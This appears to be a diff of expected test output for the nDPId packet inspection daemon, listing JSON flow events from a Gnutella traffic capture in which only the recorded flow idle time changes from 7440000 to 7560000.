-00573{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":236,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":87671,"flow_last_seen":96685,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"221.124.66.33","src_port":50282,"dst_port":13060,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00558{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":236,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":87671,"flow_last_seen":96685,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"221.124.66.33","src_port":50282,"dst_port":13060,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00572{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":226,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":85607,"flow_last_seen":94638,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"1.172.184.48","src_port":50272,"dst_port":13298,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00557{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":226,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":85607,"flow_last_seen":94638,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"1.172.184.48","src_port":50272,"dst_port":13298,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00574{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":225,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":84593,"flow_last_seen":93622,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"218.164.198.27","src_port":50271,"dst_port":60202,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00559{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":225,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":84593,"flow_last_seen":93622,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"218.164.198.27","src_port":50271,"dst_port":60202,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00572{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":224,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":84593,"flow_last_seen":93622,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"114.27.24.95","src_port":50270,"dst_port":11427,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00557{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":224,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":84593,"flow_last_seen":93622,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"114.27.24.95","src_port":50270,"dst_port":11427,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00573{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":236,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":87671,"flow_last_seen":96685,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"221.124.66.33","src_port":50282,"dst_port":13060,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00558{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":236,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":87671,"flow_last_seen":96685,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"221.124.66.33","src_port":50282,"dst_port":13060,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00572{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":226,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":85607,"flow_last_seen":94638,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"1.172.184.48","src_port":50272,"dst_port":13298,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00557{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":226,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":85607,"flow_last_seen":94638,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"1.172.184.48","src_port":50272,"dst_port":13298,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00574{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":225,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":84593,"flow_last_seen":93622,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"218.164.198.27","src_port":50271,"dst_port":60202,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00559{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":225,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":84593,"flow_last_seen":93622,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"218.164.198.27","src_port":50271,"dst_port":60202,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00572{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":224,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":84593,"flow_last_seen":93622,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"114.27.24.95","src_port":50270,"dst_port":11427,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00557{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":224,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":84593,"flow_last_seen":93622,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"114.27.24.95","src_port":50270,"dst_port":11427,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00577{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":485,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":253025,"flow_last_seen":551892,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":120,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"154.3.42.209","src_port":28681,"dst_port":6346,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00562{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":485,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":253025,"flow_last_seen":551892,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":120,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"154.3.42.209","src_port":28681,"dst_port":6346,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00574{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":145,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":73301,"flow_last_seen":82326,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"122.100.216.210","src_port":50258,"dst_port":7097,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00559{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":145,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":73301,"flow_last_seen":82326,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"122.100.216.210","src_port":50258,"dst_port":7097,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00575{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":147,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":74328,"flow_last_seen":83345,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"113.255.200.161","src_port":50260,"dst_port":51394,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00560{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":147,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":74328,"flow_last_seen":83345,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"113.255.200.161","src_port":50260,"dst_port":51394,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00572{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":81,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":70171,"flow_last_seen":79201,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"36.237.10.152","src_port":50240,"dst_port":21293,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00557{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":81,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":70171,"flow_last_seen":79201,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"36.237.10.152","src_port":50240,"dst_port":21293,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00573{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":66077,"flow_last_seen":75077,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"182.155.128.228","src_port":50216,"dst_port":3256,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00558{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":66077,"flow_last_seen":75077,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"182.155.128.228","src_port":50216,"dst_port":3256,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00571{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":64032,"flow_last_seen":73065,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"124.218.26.16","src_port":50204,"dst_port":9728,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00556{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":64032,"flow_last_seen":73065,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"124.218.26.16","src_port":50204,"dst_port":9728,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00574{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":145,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":73301,"flow_last_seen":82326,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"122.100.216.210","src_port":50258,"dst_port":7097,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00559{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":145,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":73301,"flow_last_seen":82326,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"122.100.216.210","src_port":50258,"dst_port":7097,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00575{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":147,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":74328,"flow_last_seen":83345,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"113.255.200.161","src_port":50260,"dst_port":51394,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00560{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":147,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":74328,"flow_last_seen":83345,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"113.255.200.161","src_port":50260,"dst_port":51394,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00572{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":81,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":70171,"flow_last_seen":79201,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"36.237.10.152","src_port":50240,"dst_port":21293,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00557{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":81,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":70171,"flow_last_seen":79201,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"36.237.10.152","src_port":50240,"dst_port":21293,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00573{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":66077,"flow_last_seen":75077,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"182.155.128.228","src_port":50216,"dst_port":3256,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00558{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":66077,"flow_last_seen":75077,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"182.155.128.228","src_port":50216,"dst_port":3256,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00571{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":64032,"flow_last_seen":73065,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"124.218.26.16","src_port":50204,"dst_port":9728,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00556{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":64032,"flow_last_seen":73065,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"124.218.26.16","src_port":50204,"dst_port":9728,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00576{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":771,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":490659,"flow_last_seen":551881,"flow_idle_time":180000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":56,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"202.27.193.6","src_port":28681,"dst_port":6346,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00561{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":771,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":490659,"flow_last_seen":551881,"flow_idle_time":180000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":56,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"202.27.193.6","src_port":28681,"dst_port":6346,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00571{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":234,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":87670,"flow_last_seen":96685,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"99.199.148.6","src_port":50280,"dst_port":4338,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00556{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":234,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":87670,"flow_last_seen":96685,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"99.199.148.6","src_port":50280,"dst_port":4338,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00571{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":234,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":87670,"flow_last_seen":96685,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"99.199.148.6","src_port":50280,"dst_port":4338,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00556{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":234,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":87670,"flow_last_seen":96685,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"99.199.148.6","src_port":50280,"dst_port":4338,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00579{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":133,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":72852,"flow_last_seen":551890,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":216,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"91.175.220.161","src_port":28681,"dst_port":15721,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00564{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":133,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":72852,"flow_last_seen":551890,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":216,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"91.175.220.161","src_port":28681,"dst_port":15721,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00578{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":167,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":82059,"flow_last_seen":493285,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":120,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"93.29.107.176","src_port":28681,"dst_port":20363,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00563{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":167,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":82059,"flow_last_seen":493285,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":120,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"93.29.107.176","src_port":28681,"dst_port":20363,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 